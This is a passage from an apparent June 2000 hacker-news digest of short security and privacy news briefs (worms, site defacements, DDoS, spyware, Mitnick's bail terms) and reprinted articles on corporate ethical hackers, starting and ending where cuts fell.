      office was officially opened in May and has been headed by Mr. Long
      who was the FAA's Y2K czar.
      
      Federal Computer Week
      
      http://www.fcw.com/fcw/articles/2000/0619/pol-isec-06-19-00.asp
      @HWA
 
 193.0 [HNN] June 21'00 Credit Taken for Stages Worm 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      Bruce Hughes, a manager at ICSA.net believes he has identified the
      author of the Stages Worm. 'Zulu' is believed to live in Argentina,
      speaks Spanish and English, and has written several virus/worms
      including Bubbleboy, Monopoly, FreeLinks, and others. The FBI has been
      reported as investigating the case.
      
      Reuters - via Nando Times
      Reuters - via Fox News
      
      http://www.techweb.com/wire/story/reuters/REU20000620S0009
      http://www.foxnews.com/vtech/0620/t_rt_0620_33.sml
      @HWA
      
      
 194.0 [HNN] June 21'00 Drug Office Tracks Web Visitors 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Banner 
      The White House Office of National Drug Control Policy has cookie
      enabled the ad banners that are used in its anti-drug media campaign.
      The banner ads direct users to Freevibe.com, a site sponsored by the
      Drug office. The office says that the cookies are just a method of
      tracking its ad campaign and were not meant to track users and that
      the information would not be sold or given to third parties. However
      the ad campaign is being controlled by Doubleclick which has come
      under serious fire for collating web surfers' information and
      violating users' privacy.
      
      Scripps Howard News Service
      
      http://shns.scripps.com/shns/story.cfm?pk
      @HWA
      
      
 195.0 [HNN] June 21'00 NATO Unleashes Offensive Cyberwar Weapon 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      NATO scientists at the Kfor peacekeeping force headquarters in
      Pristina, Kosovo created a virus that would secretly email documents
      from victims' hard drives. Unfortunately the virus escaped into the
      wild and is being blamed for leaking a nine-page document detailing
      the rules of engagement for NATO-soldiers to the press. The virus is
      called 'Anti-Smyser 1' and is alleged to be a variation of a MS Word
      macro virus known as THUS.Q.
      
      The Times UK
      
      http://www.the-times.co.uk/news/pages/sti/2000/06/18/stinwenws01024.html
      @HWA
      
      
 196.0 [HNN] June 21'00 Mexico Hires Hackers To Crack Password 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles
      The Mexican leftist Democratic Revolution Party (PRD) is trying to
      crack the password to a secret list of beneficiaries of a
      controversial $100 billion bank bailout that followed a currency
      crisis in 1994 and 1995. Four of the five passwords that protect the
      data are known and they are working on the last one. The party has
      hired 'hackers' to help them with the task.
      
      Reuters - via Yahoo
      
      http://dailynews.yahoo.com/h/nm/20000620/wr/mexico_hackers_dc_1.html
      @HWA
      
 197.0 [HNN] June 21'00 Privacy Issues Get Attention In Congress 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalyse Dow
      About 300 privacy bills are pending in both the House and Senate.
      While most appear to be election year pandering they are starting to
      attract attention. The debates are centering around the opt-out or
      opt-in methodologies of collecting personal information.
      
      Boston Globe - Computer News Daily
      
      http://199.97.97.16/contWriter/cnd7/2000/06/20/cndin/9395-0023-pat_nytimes.html
      @HWA
      
      
 198.0 [HNN] June 21'00 More Speakers for H2K 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by macki 
      Hope 2000 has added a new round of speakers and panels in preparation
      for the July 14-16 conference in New York City.
      
      H2K
      
      http://www.h2k.net/panels.html
      @HWA
      
      
 
 199.0 [HNN] June 22'00 White House Supports P3P 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Scully 
      The White House has come out in support of the World Wide Web
      Consortium's Platform for Privacy Preferences Project standard. P3P
      will work within a web browser and interact with a web site
      automatically. The browser will follow the preferences set by the user
      and warn the user if the web site attempts to violate those
      preferences. Privacy advocates disagree and feel that the P3P standard
      will allow web sites even more access to personal information than
      they have now. (It does sound like another election year bull shit
      ploy, but we'll see.)
      
      The White House - Office of the Press Secretary.
      ZD Net
      Electronic Privacy Information Center - Pretty Poor Privacy: An
      Assessment of P3P and Internet Privacy
      
      http://usinfo.state.gov/cgi-bin/washfile/display.pl?p
      http://www.zdnet.com/zdnn/stories/news/0,4586,2591856,00.html
      http://www.epic.org/reports/prettypoorprivacy.html
      @HWA
      
      
 200.0 [HNN] June 22'00 FSA Calls Bank Security Weak 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalyse Dow 
      The Financial Services Authority (FSA), the UK's financial services
      regulator, has told banks that they must take more care with their
      online security. The FSA said there was a high risk with new IT
      employees because adequate background checks were not being performed
      and that while banks tend to have reasonable perimeter security, they
      often found insufficient segregation between internal and external
      systems, as well as poor internal security in general.
      
      Newsbytes
      
      http://www.newsbytes.com/pubNews/00/150881.html
      @HWA
      
      
 201.0 [HNN] June 22'00 Nike.com Redirected 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench
      A group known as S-11 redirected the nike.com home page to a site
      calling for action at the World Economic Forum 2000 on Sept. 11-13 in
      Melbourne, Australia. Nike technicians have regained control of the
      site and have launched an internal investigation.
      
      Attrition.org - Mirror
      Associated Press - via Yahoo
      Nando Times
      
      http://www.attrition.org/mirror/attrition/2000/06/21/www.nike.com/
      http://dailynews.yahoo.com/h/ap/20000621/tc/nike_hackers_1.html
      http://www.nandotimes.com/technology/story/0,1643,500219236-500312244-501742874-0,00.html
      @HWA
      
      
 202.0 [HNN] June 22'00 Cybercafes labeled 'Electronic Heroin' 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      A new regulation within China prevents Cybercafes from operating
      within 200 meters of schools forcing many to close. Police in Xiamen,
      in China's Fujian province, have shut down 45 Internet cafes in the
      city. The city's Public Security Bureau insisted it must increase its
      role as an "Internet policeman".
      
      The UK Register
      
      http://www.theregister.co.uk/content/1/11480.html
      @HWA
      
      
 203.0 [HNN] June 22'00 Freeware Available to Track Napster Users 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      The release of Media Enforcer now puts the power of NetPD into the
      hands of everyone. This freeware application can track users, IP
      address, tracks traded and other information of both Napster and
      Gnutella users. Since the software can also be used to find MP3s the
      author insists on a personal email before releasing the full version.
      
      ZD Net
      Media Enforcer
      
      http://music.zdnet.com/features/enforcer/?chkpt
      http://mediaenforcer.tripod.com/enforcer/index.html
      @HWA
      
      
 204.0 [HNN] June 22'00 ECTF labeled Cyber-Mod Squad 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Space Rogue 
      The Electronic Crimes Task Force, a collaboration of local, state and
      national law enforcement groups headed by the New York office of
      the Secret Service, has been called a 240 person "cyber-mod squad". It
      would appear however that the group deals mostly with cloned cell
      phones, identity thefts and stolen credit cards with an actual
      cybercrime thrown in here and there. (Just because a criminal uses the
      Internet does not make it a cybercrime.)
      
      Computer World
      
      http://www.computerworld.com/cwi/story/0,1199,NAV47_STO45927,00.html
      @HWA      
      
      
 205.0 [HNN] June 22'00 Eleven Story Tall Tetris Game 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Lady Sharrow 
      Definitely a hardware hack if there ever was one. Members of
      Technology House at Brown University created La Bastille,
      an eleven story Tetris game. Containing eleven custom-built circuit
      boards, a twelve-story data network, a personal computer running
      Linux, a radio-frequency video game controller, and over 10,000
      Christmas lights, La Bastille transforms Brown's fourteen-story
      Sciences Library into a giant video display which allows bystanders
      to play a game of Tetris which can be seen for several miles.
      
      Tech House
      
      http://www.techhouse.org
      @HWA
 
 206.0 [HNN] June 23'00 DMCA Hearings Held By US Copyright Office 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Weld Pond 
      The US Copyright office has been holding hearings regarding exemptions
      to the Section 1201 ban on circumvention of access control
      technologies, enacted by the Digital Millennium Copyright Act in 1998.
      This prohibition on circumvention becomes effective on October 28,
      2000. In the meantime, the Copyright Office will hold hearings to
      determine whether there are particular classes of copyrighted works
      that shall be exempted from the prohibition due to the inability of
      users to use the works in a noninfringing way.
      
      Cryptome
      US Copyright Office
      
      http://cryptome.org/dmca-hearings.html
      http://www.loc.gov/copyright/1201/anticirc.html
      @HWA
      
      
 207.0 [HNN] June 23'00 COPA Appeal Rejected!
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      
      contributed by Weld Pond
      The 3rd U.S. Circuit Court of Appeals in Philadelphia has upheld lower
      court rulings that say that the Child Online Protection Act of 1998 is
      unconstitutional. The three judge panel said in a rather scathing
      opinion that the measure was so unconstitutionally broad it affected
      even non-pornographic websites. The Justice Department still has the
      ability to appeal to the Supreme Court, get the case remanded for
      trial, or give up.
      
      Wired
      US Courts - Judges decision
      
      http://www.wired.com/news/politics/0,1283,37171,00.html
      http://pacer.ca3.uscourts.gov/recentop/week/991324.txt
      @HWA
      
 208.0 [HNN] June 23'00 Mitnick Back In Court 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by macki 
      On Monday June 26 Kevin will head back to court for a clarification of
      the terms of his bail. At issue are the terms "consultant or advisor"
      which are mentioned within Kevin's bail conditions as being activities
      that he is prohibited from doing. Kevin feels that giving talks to various
      groups, including the US Senate, does not violate this provision.
      
      FREE KEVIN
      
      http://www.freekevin.com
      @HWA
      
 209.0 [HNN] June 23'00 Security Glitch Brings Lawsuit 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by renderman 
      An Edmonton man found a way to beat the odds. Zues Yaghi found a
      glitch in the programming of certain slot machines. The manufacturer,
      WMS Gaming Inc. of Chicago, has launched a $10-million lawsuit against
      him. (Why does this reaction sound like that of any one of a number of
      security glitches and bugs found in the computer security world?
      Security by obscurity does not work. Of course with Defcon just around
      the corner I'm sure a lot of people would like to know what this
      glitch is.)
      
      Edmonton Journal
      
      http://www.edmontonjournal.com/stories1/000622/4325404.html
      @HWA
      
 210.0 [HNN] June 23'00 UAE Files Charges Against British Worker 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by William Knowles 
      A British man working in the United Arab Emirates has been accused of
      breaking into various computer systems and 'damaging the economy'. The
      man's activities had been traced by the Emirates Telecommunications Corp
      (Etisalat) network security staff. UAE has no specific laws regarding
      computer attacks but a charge of 'damaging the economy' carries a
      maximum penalty of ten years.
      
      Reuters - via Excite
      
      http://news.excite.com/news/r/000622/04/net-emirates-hacker-dc
      @HWA
      
 211.0 [HNN] June 23'00  Feedback on Female Hackers 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Weld Pond 
      ABC received so much feedback from its original story about women in
      the underground that it has decided to publish some of those
      comments which for the most part are pretty good.
      
      ABC News
      
      http://abcnews.go.com/sections/tech/DailyNews/hackerfeedback_000619.html
      @HWA
      
 212.0 [HNN] June 23'00 Online Retailers Don't Provide Adequate Security 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalyse Dow 
      A study entitled "Top of the E-Class: Ranking and Best Practices of
      over 170 Web Sites" found that on-line retailers fail to provide
      shoppers with adequate security and privacy protection. The report,
      commissioned for Ryerson Polytechnic University's Center for the Study
      of Commercial Activity, found a full third of retailers did not even
      meet minimum security standards.
      
      The Globe and Mail
      
      http://www.globetechnology.com/archive/gam/News/20000622/RSECU.html
      @HWA
      
 213.0 [HNN] June 23'00 Better to Be Scared Than Sorry? 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by newbie 
      While administrators and users need to treat all reports of every
      threat seriously this article seems to suggest that crying wolf is in
      itself acceptable. It should be the responsibility of the security
      industry to verify that its information is absolutely correct before
      informing the media. Creating a nationwide cyber panic over a threat
      that does not exist is not helpful, does not heighten awareness, and
      does not increase security. Instead it wastes time, desensitizes
      users, and costs corporations money.
      
      Computer World - via CNN
      
      http://www.cnn.com/2000/TECH/computing/06/21/security.warning.idg/index.html
      @HWA
      
 214.0 [HNN] June 23'00 Snooping Enters the Mainstream 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench
      With the low cost availability of software that allows keystroke
      recording many people are finding just how easy it is to snoop on
      someone else. Spyware is becoming all the rage with spouses who
      suspect cheating, parents who suspect anything, and employers who want
      to check up on their employees.
      
      NY Times
      
      http://www.nytimes.com/library/tech/yr/mo/circuits/articles/22pete.html
      @HWA
 
 215.0 [HNN] June 26'00 24,000 Credit Card Numbers At Risk
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      
      contributed by William Knowles 
      A pioneering internet service provider in England has become the
      victim of an online attack. Redhotant lost its entire customer
      database which included names, addresses, passwords and credit card
      numbers. The ISP has denied that the break-in has occurred but a
      security consultant has told The Times UK that he was able to access
      the database.
      
      The Times UK
      
      http://www.the-times.co.uk/news/pages/sti/2000/06/25/stinwenws01002.html
      @HWA
      
 216.0 [HNN] June 26'00  Russians Introduce Cyber Doctrine 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by William Knowles 
      President Vladimir Putin's powerful Security Council has approved an
      'information security doctrine' to strengthen the government's role in
      monitoring information flow within Russia. The unpublished doctrine is
      supposed to protect journalists' rights, crack down on cybercrime and
      support the telecom industry.
      
      Associated Press - via The Age
      
      http://www.theage.com.au/breaking/0006/24/A30741-2000Jun24.shtml
      @HWA
      
 217.0 [HNN] June 26'00 Mitnick In Court Today 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Sarge 
      Kevin Mitnick will return to court today in an effort to clarify his
      bail conditions. When released from jail earlier this year he was told
      that he could not 'consult' on computer related matters. It is hoped
      that he will be able to convince the judge that lectures and writing a
      column for an online magazine do not constitute 'consulting'.
      
      Reuters - via ZD Net
      
      http://www.zdnet.com/zdnn/stories/news/0,4586,2593948,00.html
      @HWA
      
 218.0 [HNN] June 26'00 More Info Reported Missing At Los Alamos 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Apocalyse Dow 
      An audit of classified information at Los Alamos turned up two
      10-year-old floppy disks missing. The disks were found the next day.
      The audit also found an equipment closet unlocked inside a secure
      room. The Department of Energy will be investigating both events. (Ten
      year old floppies? Hello? Floppies are only valid for approximately
      six months.)
      
      APB News
      
      http://www.apbnews.com/newscenter/breakingnews/2000/06/24/losalamos0624_01.html
      @HWA
      
 219.0 [HNN] June 26'00 The HoneyNet Research Project 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Al 
      A pretty unconventional research paper was recently released which
      focuses on an examination of black-hat activity following the
      compromise of a honeynet setup. This paper is the result of the work
      and research of the Honeynet Project, which shows detailed keystroke
      logs of everything that these unsuspecting blackhats did to hack and
      maintain root on the system, as well as full transcripts of their IRC
      sessions while they were being watched. The Honeynet Project estimates
      that over 370 other systems were compromised in this two-week period
      by the same individuals.
      
      Security Focus
      
      http://www.securityfocus.com/frames/?focus
      @HWA
      
 220.0 [HNN] June 26'00 Cell Phones And Driving Don't Mix 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalyse Dow 
      Singapore, known for its strict anti-littering and anti-chewing gum
      laws, now plans to jail motorists who hold mobile phones to their ears
      while driving. Violators face a six-month jail term for a first
      offense or a S$1,000 ($588 U.S.) fine, or both, and a driving ban. A
      second offense would double the fine and jail term. (Hang up and
      drive.)
      
      ZD Net
      
      http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2593947,00.html?chkpt
      @HWA
      
 221.0 [HNN] June 26'00 New Viruses Attack The Soul 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Code Kid
      It is no longer a question of what a virus does but how it gets the
      user to execute it. How well the software social engineers the user
      into executing the email attachment is the critical step in getting an
      email virus to propagate widely.
      
      ZD Net
      
      http://www.zdnet.com/zdnn/stories/news/0,4586,2593514,00.html
      @HWA
      
 222.0 [HNN] June 26'00 Traditional Hackers Upset Over Use of Term 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Code Kid 
      Hacker, cracker, criminal, we have heard it all before but for some
      reason this angle still gets press. Hackers are upset about the use of
      the term 'hacker' to describe criminals. (Yawn, now there is up to the
      minute reporting for you.)
      
      Australian Financial Review
      
      http://www.afr.com.au/reports/20000620/A19851-2000Jun19.html
      @HWA
 
 223.0 [HNN] June 27'00 Oracle Admits to Spying on Microsoft 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by ted 
      The second largest software company in the world has admitted that it
      hired a detective agency to investigate the allies of the largest
      software company in the world. In a statement released yesterday
      Oracle admitted that it hired Investigative Group International Inc.
      to expose certain industry trade groups as puppets of Microsoft.
      
      Wall Street Journal
      The Register UK
      
      http://interactive.wsj.com/articles/SB962146554881934536.htm
      http://www.theregister.co.uk/content/1/11637.html
      @HWA
      
 224.0 [HNN] June 27'00  FBI To Investigate Stages Worm 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Apocalyse Dow 
      After 12 days the Stages worm has caused many headaches for
      administrators and ISPs. The FBI has announced that they are now
      starting an investigation into who and where the worm came from.
      Initially they believe that the virus/worm originated in Argentina.
      When the virus/worm is triggered, it appears to activate links to
      pornographic sites and changes the home page of the victims' Internet
      Explorer browser to a porn site.
      
      Newsbytes
      Stages - via Computer Associates
      
      http://www.newsbytes.com/pubNews/00/151173.html
      http://www.ca.com/virusinfo/
      @HWA
      
 225.0 [HNN] June 27'00  Mattel Will Remove Spyware 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Renderman 
      Mattel has announced that they will be releasing a tool to uninstall
      spyware included with many of their children's titles such as 'Reader
      Rabbit', 'Arthur' and 'Little Bear'. The software, known as
      "Broadcast," would send a product identification number and some
      technical information to Mattel and then download advertising for
      products targeted at the user. Strangely enough this spyware does not
      fall under COPPA because Mattel is not a web-site or on-line service,
      however Mattel decided to stop using the software anyway. (Well,
      that's mighty nice of them.)
      
      ABC News
      url vanished!
      
      @HWA

 226.0 [HNN] June 27'00 Russia Accuses Lithuanian of Hacking For The US 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Jonas.Bijunas 
      Russia's FSB domestic security service said on Monday it had exposed
      and detained a Lithuanian on charges he spied for the United States by
      breaking into its computer systems. The FSB claimed that the spy
      admitted to the acts and that the goal was to penetrate information
      systems to determine their structure, defensive measures, and to
      create holes for later use.
      
      Reuters - via AltaVista Live
      
      http://live.altavista.com/scripts/editorial.dll?ei
      @HWA
      
 227.0 [HNN] June 27'00 BSA Settles With 20 Companies  
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalyse Dow 
      The Business Software Alliance has announced 20 settlements with
      companies it found to be copying programs or using unlicensed copies.
      The settlements will result in more than $2.4 million in fines to be
      paid to BSA. Details of the settlements will be made over the next
      week. (Milk it for all it's worth)
      
      ABC News
      e-commerce Times
      
      http://abcnews.go.com/sections/tech/DailyNews/piracy000627.html
      http://www.ecommercetimes.com/news/articles2000/000627-5.shtml
      @HWA
      
 228.0 [HNN] June 27'00 UAE Telecom Firm Will Prosecute 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Code Kid
      United Arab Emirates telecommunications firm Etisalat has vowed to
      prosecute anyone who abuses the country's Internet system. Lee Alan
      Ashurst, 21, of Manchester, England, who is suspected by Etisalat
      officials of breaking into the systems and causing service disruptions
      earlier this month, has denied the accusations and said he had filed
      lawsuits for defamation and damages against Etisalat.
      
      Reuters - Yahoo
      
      http://dailynews.yahoo.com/h/nm/20000628/wr/emirates_hacker_dc_2.html
      @HWA

 229.0 [HNN] June 28'00 Oracle Admits to Spying on Microsoft 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by ted 
      The second largest software company in the world has admitted that it
      hired a detective agency to investigate the allies of the largest
      software company in the world. In a statement released yesterday
      Oracle admitted that it hired Investigative Group International Inc.
      to expose certain industry trade groups as puppets of Microsoft.
      
      Wall Street Journal
      The Register UK
      
      http://interactive.wsj.com/articles/SB962146554881934536.htm
      http://www.theregister.co.uk/content/1/11637.html
      @HWA
      
 230.0 [IND] UK: White-hat Hacker Engaged In Black Arts
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      May 23 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_052300a_j.shtml      
      
      5/23/00
      UK: White-hat Hacker Engaged In Black Arts
      
      MICK is an ethical hacker. There is not much more we can say about him, 
      not even his real name, except that he lives in the UK and is a frontline 
      fighter in the escalating war against cybercrime.

      Mick is employed by IBM Global Services as a "white-hat" hacker. His days 
      are spent trying to break into the computer networks of IBM's clients, 
      either remotely on the Internet or in disguise by infiltrating the 
      client's building and hacking into the computer system on site.

      Only one person within the target organisation, usually a senior 
      executive, will know Mick's identity. He is armed with a waiver from 
      prosecution should the mission be successful in exposing flaws in a 
      company's computer security.

      Mick says he used to write security products, such as fire walls for 
      keeping intruders and viruses out of companies' computer networks, before 
      moving on to IBM's ethical hacker team. "IBM thought it would be good to 
      have somebody who makes security, break security," he says.

      Mick says his work is vital in protecting companies, and ultimately their 
      customers, from cybercrimes such as viruses, the distributed denial of 
      service (DDOS) attacks that hit Yahoo! and other Internet sites earlier 
      this year and credit card fraud.

      His enemies range from kids messing about with virus-writing tools 
      available over the Internet to disgruntled employees and seriously 
      intelligent "black hat hackers" out to do maximum damage to a company 
      through its computers.

      The FBI and Interpol have identified a growing trend in unethical 
      companies and countries employing black-hat hackers to damage rival 
      companies and even countries. "There is definitely information warfare 
      going on," Mick says.

      One of the biggest problems faced by providers of computer security 
      services is an understandable reluctance on the part of companies to admit 
      their security flaws or report breaches. Mick says that the DDOS attacks 
      and this month's ILOVEYOU virus, which both cost industry billions of 
      pounds, have raised awareness and budgets for computer security. Mick says 
      UK companies must embrace computer security by putting comprehensive 
      policies in place and regularly updating and testing defences. "In the US, 
      security has a great profile from CEO down to the cleaner," he says. "The 
      UK has a lot to learn, but it is learning very fast."

      Jonathon Fornaci, chief executive of AtomicTangerine, an Internet 
      consultancy firm spun out of the Stanford Research Institute, says 
      computer security is "critical" as companies embrace e-business. He says 
      governments around the world are tackling the problem, but have admitted 
      that they are virtually powerless to protect companies and consumers from 
      cybercrime. He says it is up to companies to protect themselves.

      Mick agrees: "There is a limit to what the Government can do. You can't 
      spend hundreds of thousands of pounds of resources to catch somebody who's 
      doing minimal damage. You don't take the whole Hampshire police force to 
      track down a jaywalker."

      Fornaci believes that companies also share a "social and moral obligation" 
      to employ sound computer security systems because of the trend for hackers 
      and virus writers to use companies' websites as staging posts for attacks 
      on other companies.

      By Clive Mathieson. (c) Times Newspapers Ltd, 2000. THE TIMES 20/05/2000 
      P31 
      
      @HWA
       
231.0  [IND] India: Licensed To Bill - `Ethical Hackers' Get Paid To Crack E-security.
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      May 23 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_052300b_j.shtml      
      
      5/23/00
      India: Licensed To Bill - `Ethical Hackers' Get Paid To Crack E-security.
      
      MUMBAI: A new breed of hackers is on the loose. They are not the ones who 
      have been giving corporate IT managers nightmares so far -- teenagers 
      sitting in some dark room, attacking corporate computer systems or 
      stealing vital data.

      The new species carries a valid `double oh' license. They are fully 
      authorised to hack into companies, ranging from banks to e-commerce 
      organisations. Reason? To thoroughly check system security and plug 
      relevant problems.

      Many of them are pioneers in a shadowy business that may seem more like a 
      scene from the Hollywood blockbuster `The Net,' where Sandra Bullock falls 
      victim to a group of expert computer hackers, than reality.

      Global professional services firm Ernst & Young actually gets paid for 
      hiring out their `ethical hackers' to large companies, mostly in the 
      banking, insurance, B2B and B2C arenas.

      With the proliferation of dotcoms here, the scene is merely warming up, 
      with the web becoming an even more attractive playground for hackers. 
      Mushrooming e-commerce has meant an increasing volume of sensitive data, 
      specially financial data, getting transferred over the Internet. As a 
      result, a hacker attack is no longer a mere annoyance for companies. It 
      could lead to major financial loss. "75 per cent of the hacking that we 
      encounter is from within the same organisation that we are employed to 
      check," states Ernst & Young (E&Y) national director Sunil Chandiramani. 
      "That is a frightening statistic," he adds.

      A member of the Cybercop committee of the NASSCOM, Mr Chandiramani is also 
      in the working committee of the Securities and Exchange Board of India 
      (SEBI) on Internet trading surveillance and enforcement related issues. 
      Says Mr Chandiramani: "Most times, we can get into nine of the 10 companies 
      via the Internet and then come back with some souvenir to show that we 
      were there."

      E&Y's `eXtreme hacking' is a cutting edge tool and methodology adopted by 
      the firm to defend sites and provide the necessary security solutions. The 
      firm also conducts training sessions to enable corporates double-check 
      their security system and familiarise them with network-based attack and 
      penetration exploits, that hackers may use against their networks.

      Providing security solutions for a complex world may not be an easy task 
      for it is necessary to assess, architect and implement solutions to 
      protect vital information resources. Hackers have gained prominence for 
      their ability to penetrate hard-to-crack computer centres by exposing an 
      unnoticed vulnerability or by making a clear anti-authority statement and 
      even in some cases, re-designing the front page of the web site.

      As for the kind of perpetrators? According to a global information 
      security survey conducted by E&Y, 24.8 per cent of the threats facing 
      organisations today come from hackers and 13.9 per cent of the hacking 
      incidents are actuated by competitors. While 7.5 per cent are authorised 
      users of the system, an equally high number of 6.2 per cent are contract 
      workers and consultants. Unauthorised users account for 20.8 per cent of 
      cyber crimes, the survey points out.

      Though security concerns are "very new here (in India)" with e-commerce 
      merely testing the waters here, attacks into high profile databases are on 
      the increase and are expected to bring to boil a $4 billion content 
      security market in the next couple of years, according to industry 
      estimates.

      As Mr Chandiramani states, "We don't just go to the firewall and prove 
      that we can break in, but we go into the main computers itself. At times, 
      we deploy staff to get into the EPBX system to get telephone numbers," he 
      said adding, "it is not hard to convince companies of their security 
      loopholes once we have managed to hack into their system."

      That is not to say that companies have not deployed solutions to counter 
      hacking. Among several corporate houses, Unilever has corporate IT 
      security policies and standards that are applied around the globe, both 
      within the organisation and with their close business associates. ICICI, 
      too, has an established security organisation structure and has developed 
      IT security policy and procedures which are in place.

      While Hindustan Lever Limited undertakes regular attack and penetration 
      testing, Sprint RPG India Limited has developed policies and procedures 
      for maximising the effectiveness of their IT processes.

      With borderless transactions getting to be the norm, India will be as 
      vulnerable as any other country to intrusions of this nature. Moreover, 
      with electronic records becoming legally acceptable, there is a growing 
      threat that companies could stand to lose valuable information if adequate 
      care is not taken of the health of the media on which the records are 
      stored.

      By Amrita Nair-Ghaswalla. (c) 2000 The Times of India Group. TIMES OF 
      INDIA 20/05/2000 
      
      @HWA

  232.0 [IND] Hackers Shoot, Score On NHL Web Site
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
      May 25 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_052500a_j.shtml     
      
      5/25/00
      Hackers Shoot, Score On NHL Web Site
      By Martin Stone, Newsbytes
      NEW YORK, NEW YORK, U.S.A.,
      25 May 2000, 6:47 AM CST
      
      Officials of the National Hockey League (NHL) and FBI investigators are 
      reportedly attempting to find the culprit or culprits who disabled the 
      league's official Web site in the midst of the Stanley Cup playoffs.

      An Associated Press report today said it remained uncertain whether 
      hackers cross-checked the site at http://www.NHL.com on Sunday with a 
      Distributed Denial of Service (DDoS) attack, but the results seem similar 
      to the so-called "smurf" invasions that brought down Yahoo, eBay, eTrade, 
      CNN, Amazon.com and other sites in February.

      The league said it had filed a formal complaint with the FBI in addition 
      to seeking help from security firms to track down the hackers.

      A league official told AP, "Someone was flooding the pipeline with bogus 
      requests through distributed PCs. The whole system was overloaded. But the 
      intranet was not compromised," he said, referring to the NHL's internal 
      Web network.

      The spokesman confirmed the site is still experiencing "spotty service", 
      the report said. 
      
      @HWA
      
 233.0 [IND] Computer whiz alters high school's grades
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
      May 25 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_052500b_j.shtml     
      
      5/25/00
      Computer Whiz Alters High School's Grades
      
      Associated Press -
      
      POCATELLO, Idaho - Someone allegedly hacked into the computer system at
      Highland High School and changed students' grades.
      
      http://www.spokane.net:80/news-story-body.asp?Date=052000&ID=s804878&cat= 
      
      "We've had some computer espionage from students," Pocatello School 
